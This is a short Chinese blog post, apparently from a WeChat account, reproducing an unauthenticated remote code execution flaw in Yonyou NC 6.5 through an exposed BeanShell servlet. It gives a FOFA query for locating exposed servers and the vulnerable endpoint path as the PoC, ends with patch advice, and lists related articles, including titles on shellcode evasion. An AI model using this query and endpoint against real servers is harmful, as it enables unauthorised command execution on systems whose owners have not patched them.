查看原文
其他

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

SuPejkj 渗透Xiao白帽 2022-11-05

0x01 简介

该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。


0x02 影响版本

NC6.5版本


0x03 漏洞复现

FOFA语句:

icon_hash="1085941792"

访问目标站点这个酱紫

执行命令

PoC:

/servlet/~ic/bsh.servlet.BshServlet


脚本验证

用脚写的太菜就不放出来见笑了


0x04 修复方案

官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。下载链接:http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗

往期文章有彩蛋哦

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存